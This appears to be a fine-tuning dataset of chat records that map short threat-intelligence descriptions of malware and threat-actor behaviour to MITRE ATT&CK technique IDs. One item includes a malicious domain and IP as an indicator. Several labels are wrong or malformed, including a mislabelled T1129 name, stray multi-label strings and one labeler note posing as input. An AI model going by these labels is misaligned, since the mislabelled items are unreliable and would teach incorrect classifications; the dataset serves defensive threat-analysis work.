- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 queried the Registry to identify victim information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has performed watering hole attacks."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Equation has been observed utilizing environmental keying in payload delivery."
- },
- {
- "role": "assistant",
- "content": "T1480.001 - Environmental Keying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can deobfuscate packed binaries in memory."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can use WMI for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has been used to run the \"tasklist\" command on a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet uses a driver to scan for specific filesystem driver objects."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After connecting to the IRC server, the MPK bot sends custom ping messages and provides an introduction via a “!Hello” message that contains the current logged in user of the infected host, if the user has administrator privileges, the hostname, the UUID of the system, and operating system version"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can retrieve lists of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can download files to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework. The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has communicated with the C2 server by sending POST requests over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the .lnk file is initialized, it spawns a CMD process"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the victim computer name and encrypts the information to send over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can ZIP directories on the target system."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WMI classes are the primary structure within WMI"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware used by is capable of capturing keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used Ncrack to reveal credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in “%APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word” and “%APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack can list running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor launched a series of reconnaissance commands to try to obtain and enumerate information about the compromised machine, network architecture, users, and active directory enumeration"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collect + keychain in same sentence"
- },
- {
- "role": "assistant",
- "content": "T1555.001 - Credentials from Password Stores: Keychain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian has the ability to use Python to spawn a Unix shell."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has used the AD Explorer tool to enumerate users on a victim's network."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs UAC bypass."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Axiom group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat can download additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS attempts to hide its payloads using legitimate filenames."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a command to perform video device spying."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has sent e-mails with malicious links to credential harvesting websites."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as public key or keyboard-interactive authentication. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto collects information on bookmarks from Google Chrome."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has installed web shells on exploited Microsoft Exchange servers."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used Tasklist to obtain information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT is capable of manipulating and deleting registry keys, including those used for persistence."
- },
- {
- "role": "assistant",
- "content": "T1070.009 - Clear Persistence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After installation, a keylogging routine begins. The malware writes keystrokes and window information to a filename in the present working directory with the following filename"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1036.002 - Right-to-Left Override"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hikit has used DLL Search Order Hijacking to load \"oci.dll\" as a persistence mechanism."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They dumped specific hives from the Windows Registry, such as the SAM hive, which contains password hashes"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell has a module to collect information from the local database."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server. The error code is the value returned by the GetLastError function and sent in the next beacon. This was likely included to help the attackers understand the problem if the backdoor is unable to receive a response (Figure 9). This Cookie header is a unique indicator that can be used for network-based detection"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy has collected information and files from a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "decodes strings in the malware using XOR and RC4."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NavRAT uses \"tasklist /v\" to check running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a scheduled task to run itself every three minutes."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, the initialized file downloads multiple malicious payloads from remote servers"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. Rising Sun can enumerate the compilation timestamp of Windows executable files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro can download malicious files with a .tmp extension and append them with .exe prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once on a victim’s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory. It then passes the config buffer to the extracted DLL and calls the exported function (Shellex"
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seasalt uses cmd.exe to create a reverse shell on the infected endpoint."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, in the event Kaspersky is detected, the malware will immediately run the ‘Conime.lnk’ shortcut file in a new process after it is created"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has a keylogging module."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has conducted internal spearphishing from within a compromised organization."
- },
- {
- "role": "assistant",
- "content": "T1534 - Internal Spearphishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt is one of the most notorious cybercrime operations, with attacks against more than 100 banks across 40 countries attributed to the group. Morphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in March of 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. Although the code is heavily obfuscated, the entry point is easily identifiable. The VB code is executed starting from the Frame1_Layout function – this method is used much less frequently than the obvious Document_Open or the AutoOpen. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Organizations should expect to see much more coming from all Cobalt Group factions during the next year"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a keylogger module."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Steals Google Chrome and Apple Safari browser cookies from the victim’s machine - Steals saved usernames and passwords in Chrome - Steals saved credit card credentials in Chrome - Steals iPhone’s text messages if backed up to Mac - Steals cryptocurrency wallet data and keys - Keeps full control of the victim using the EmPyre backdoor - Mines cryptocurrency on the victim’s machine"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader has the ability to self delete."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When checking network connection with the “netstat” command, both cases use the “-naop” option in conjunction with the “tcp“ - Filtering the result, both cases use the “findstr” command instead of “find"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware used by attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe)."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "mericcs.org 221.121.138.141 Domain used for spear phish sender e-mail address and to host malicious documents"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has exfiltrated entire mailboxes from compromised accounts."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by SPACESHIP."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In our analysis we could observe how the adversary ensures persistence by delivering an LNK file into the startup folder"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL:http:///what? After issuing the what command, the Trojan will parse the C2’s response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1573 - Encrypted Channel', 'T1041 - Exfiltration Over C2 Channel', 'T1571 - Non-Standard Port', 'T1132 - Data Encoding', 'T1008 - Fallback Channels', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
